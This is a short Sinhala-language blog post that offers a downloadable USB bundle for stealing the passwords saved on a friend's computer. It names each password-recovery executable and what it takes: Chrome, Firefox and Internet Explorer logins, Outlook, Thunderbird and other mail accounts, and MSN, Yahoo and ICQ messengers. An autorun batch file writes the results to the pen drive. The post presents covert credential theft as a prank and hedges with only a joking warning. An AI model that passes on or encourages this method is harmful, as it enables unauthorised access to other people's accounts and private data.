No title

මම අද කියන්න යන්න game එකක් ගැන නෙමයි එඋනට මෙ softwaer එක ඔයලට ගොඩක් වටිනව මොකද මෙ softwaer එකන් කරන්න ඔයාගෙ යාලුවගෙ pc එකෙ save වෙලා තියන password ඔයාලට අරගන්න පුලුවන්
මම පහලින් දීල තියෙන එක බාගෙන පෙන් එකට කොපි කරලා යාලුවගෙ හරි pc එකකටගහන එක විතරයි.
එතකොට notepad එකකට අරකෙ තිබ්බ හැම password එකක්ම ඔයාගේ පෙන් එකේ ගබඩා වෙනවා
මේකේ save වන පාස් මේ file වලට එවි
1 ChromePass.exe - මේකෙන් කරන්නේ පරිගනකයේ Google Chrome බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
iepv.exe - මේකෙන් කරන්නේ පරිගනකයේ Internet Explorer බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
2 mailpv.exe - මේකෙන් කරන්නේ පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free වල save කර ඇති passwords ලබා ගැනීම
mspass.exe- මේකෙන් කරන්නේ පරිගනකයේ MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM වල save කර ඇති passwords ලබා ගැනීම
3 PasswordFox.exe - මේකෙන් කරන්නේ පරිගනකයේ FireFox බ්‍රවුසරය ඇත්නම් එහි save කර ඇති passwords ලබා ගැනීම
4 pspv.exe - මේකෙන් කරන්නෙත් පරිගනකයේ Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), වල save කර ඇති passwords ලබා ගැනීම
autorun.bat - මේකෙන් කරන්නේ අර උඩ කියපු පොඩි පොඩි ‍මෘදුකාංග වලින් ලබා ගන්නා passwords ඔබේ පෙන් එක තුල text files ආකාරයට සේව් කිරීම.
(මෙ ක්‍රමය හොද යාලුවන්ට කරන්න එපා හොද් මම මකියුවෙ මට වගෙ)

Post a Comment

Previous Post Next Post

Contact Form